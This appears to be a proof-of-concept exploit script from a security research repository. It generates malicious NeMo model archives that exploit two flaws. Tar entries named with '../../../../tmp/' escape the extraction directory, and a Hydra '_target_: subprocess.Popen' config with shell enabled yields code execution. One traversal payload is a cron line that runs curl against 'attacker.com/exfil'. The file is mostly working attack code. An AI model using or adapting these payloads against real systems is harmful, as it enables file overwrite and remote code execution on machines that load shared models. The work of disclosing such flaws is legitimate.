exploits / nemo /craft_malicious_nemo.py

Upload nemo/craft_malicious_nemo.py with huggingface_hub

20db0ae verified about 1 month ago

6.94 kB

	"""
	PoC: NeMo Path Traversal + Hydra _target_ Injection
	=====================================================
	Crafts malicious .nemo files demonstrating two vulnerabilities:

	1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
	2. Hydra Injection: _target_ field in config instantiates arbitrary classes

	Usage:
	    python craft_malicious_nemo.py                    # Generate both PoCs
	    python craft_malicious_nemo.py --type traversal   # Path traversal only
	    python craft_malicious_nemo.py --type hydra       # Hydra injection only
	    python craft_malicious_nemo.py --verify           # Show archive contents

	This is for authorized security research only.
	"""

	import tarfile
	import io
	import os
	import argparse


	def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
	    """
	    Create a .nemo file with path traversal in tar entry names.

	    The archive is an uncompressed tar ("w:" mode) built from three in-memory
	    entries: a ``model_config.yaml`` followed by two members whose names begin
	    with ``../../../../tmp/``. After writing, the archive is reopened and a
	    summary (size, member names, explanatory notes) is printed to stdout.

	    Per the original PoC notes: when model_utils.load_config() or
	    save_artifacts() processes this file, tar.extract() writes files outside
	    the intended directory because _safe_extract() is NOT used in
	    model_utils.py (only in save_restore_connector.py).

	    Args:
	        output_path: Path of the archive to create (an existing file is
	            overwritten).

	    Returns:
	        The ``output_path`` argument, unchanged.
	    """

	    with tarfile.open(output_path, "w:") as tar:
	        # 1. Legitimate model_config.yaml (required for detect_prefix())
	        # NOTE(review): the continuation lines of this literal start at the
	        # file's left margin, so the keys are not space-indented under
	        # "model:" -- confirm the intended YAML nesting against upstream.
	        config_content = b"""model:
	name: poc_path_traversal
	target: nemo_test
	class_path: nemo.collections.asr.models.EncDecCTCModel
	"""
	        config_info = tarfile.TarInfo(name="model_config.yaml")
	        # TarInfo.size must match the payload length or addfile() would
	        # store a truncated/empty member.
	        config_info.size = len(config_content)
	        tar.addfile(config_info, io.BytesIO(config_content))

	        # 2. Path traversal entry -- escapes extraction directory
	        # When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp)
	        # the prefix from detect_prefix() is "", so it extracts "model_config.yaml"
	        # But save_artifacts extracts arbitrary artifact paths from the tar,
	        # and a crafted artifact path can escape.
	        payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"

	        # Traversal via artifact name
	        traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt")
	        traversal_info.size = len(payload)
	        tar.addfile(traversal_info, io.BytesIO(payload))

	        # Additional traversal -- overwrite a more dangerous location
	        payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"
	        traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron")
	        traversal_info2.size = len(payload2)
	        tar.addfile(traversal_info2, io.BytesIO(payload2))

	    # Measured only after the writer is closed so the size is final.
	    file_size = os.path.getsize(output_path)
	    print(f"[+] Path traversal .nemo written to: {output_path}")
	    print(f" Size: {file_size} bytes")
	    print()
	    print(" Tar contents:")
	    # Members are only listed here, never extracted.
	    with tarfile.open(output_path, "r:") as tar:
	        for member in tar.getmembers():
	            escape = " <-- PATH TRAVERSAL" if ".." in member.name else ""
	            print(f" {member.name}{escape}")
	    print()
	    print("[!] When loaded by nemo.utils.model_utils.load_config():")
	    print(" tar.extract() has NO path validation (_safe_extract not used)")
	    print(" Files are written outside the temp extraction directory")
	    return output_path


	def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
	    """
	    Create a .nemo file with Hydra _target_ injection in config.

	    The archive is an uncompressed tar ("w:" mode) with two in-memory
	    entries: ``model_config.yaml`` (whose ``optim`` section carries a
	    ``_target_`` key) and a 64-byte all-zero ``model_weights.ckpt``. After
	    writing, the archive is reopened and a summary is printed to stdout.

	    Per the original PoC notes: when setup_optimization() processes this
	    config, it calls hydra.utils.instantiate() with the attacker-controlled
	    _target_, which can point to subprocess.Popen or any importable class.

	    Args:
	        output_path: Path of the archive to create (an existing file is
	            overwritten).

	    Returns:
	        The ``output_path`` argument, unchanged.
	    """

	    # Config with malicious _target_ pointing to subprocess.Popen
	    # NOTE(review): the continuation lines of this literal start at the
	    # file's left margin, so the nesting of optim/args/sched is not expressed
	    # with spaces -- confirm the intended YAML structure against upstream.
	    config_content = b"""model:
	name: poc_hydra_injection
	target: nemo_test
	optim:
	_target_: subprocess.Popen
	args:
	- "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"
	shell: true
	sched:
	name: CosineAnnealing
	warmup_steps: 100
	"""

	    with tarfile.open(output_path, "w:") as tar:
	        config_info = tarfile.TarInfo(name="model_config.yaml")
	        # TarInfo.size must match the payload length or addfile() would
	        # store a truncated/empty member.
	        config_info.size = len(config_content)
	        tar.addfile(config_info, io.BytesIO(config_content))

	        # Add a dummy weights file to look like a real .nemo
	        weights = b"\x00" * 64
	        weights_info = tarfile.TarInfo(name="model_weights.ckpt")
	        weights_info.size = len(weights)
	        tar.addfile(weights_info, io.BytesIO(weights))

	    # Measured only after the writer is closed so the size is final.
	    file_size = os.path.getsize(output_path)
	    print(f"[+] Hydra injection .nemo written to: {output_path}")
	    print(f" Size: {file_size} bytes")
	    print()
	    print(" Tar contents:")
	    # Members are only listed here, never extracted.
	    with tarfile.open(output_path, "r:") as tar:
	        for member in tar.getmembers():
	            print(f" {member.name}")
	    print()
	    print(" Malicious config excerpt:")
	    print(" optim:")
	    print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION")
	    print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
	    print(" shell: true")
	    print()
	    print("[!] When loaded by NeMo and setup_optimization() is called:")
	    print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
	    print(" -> Instantiates subprocess.Popen with attacker args -> RCE")
	    return output_path


	def main(argv=None):
	    """Parse command-line options and generate the requested PoC archives.

	    Options:
	        --type        "traversal", "hydra" or "both" (default "both").
	        --verify      After generation, list each archive's members and print
	                      the first lines of its model_config.yaml.
	        --output-dir  Directory that receives the generated files
	                      (default "."); it is created if it does not exist.

	    Args:
	        argv: Optional list of argument strings. ``None`` (the default) makes
	            argparse read ``sys.argv[1:]``, which is what a bare ``main()``
	            call did before this parameter existed.
	    """
	    parser = argparse.ArgumentParser(description="NeMo PoC generator")
	    parser.add_argument("--type", choices=["traversal", "hydra", "both"],
	                        default="both", help="Which PoC to generate")
	    parser.add_argument("--verify", action="store_true",
	                        help="Show archive contents after generation")
	    parser.add_argument("--output-dir", default=".", help="Output directory")
	    args = parser.parse_args(argv)

	    # Create the destination up front; otherwise tarfile.open() in the craft
	    # functions fails with FileNotFoundError for a not-yet-existing directory.
	    if args.output_dir:
	        os.makedirs(args.output_dir, exist_ok=True)

	    paths = []

	    if args.type in ("traversal", "both"):
	        path = craft_path_traversal_nemo(
	            os.path.join(args.output_dir, "path_traversal.nemo"))
	        paths.append(path)
	        print()

	    if args.type in ("hydra", "both"):
	        path = craft_hydra_injection_nemo(
	            os.path.join(args.output_dir, "hydra_injection.nemo"))
	        paths.append(path)
	        print()

	    if args.verify:
	        for path in paths:
	            print(f"=== Verifying {path} ===")
	            # Read-only inspection: members are listed and the config is read
	            # in memory; nothing is extracted to disk.
	            with tarfile.open(path, "r:") as tar:
	                for member in tar.getmembers():
	                    print(f" {member.name} ({member.size} bytes)")
	                    if member.name != "model_config.yaml":
	                        continue
	                    config_file = tar.extractfile(member)
	                    # extractfile() returns None for non-regular members.
	                    if config_file is None:
	                        continue
	                    # Close the member handle deterministically.
	                    with config_file:
	                        preview = config_file.read().decode().split("\n")[:10]
	                    print(" Config preview:")
	                    for line in preview:
	                        print(f" {line}")
	            print()


	# Run the CLI only when executed as a script, not when imported.
	if __name__ == "__main__":
	    main()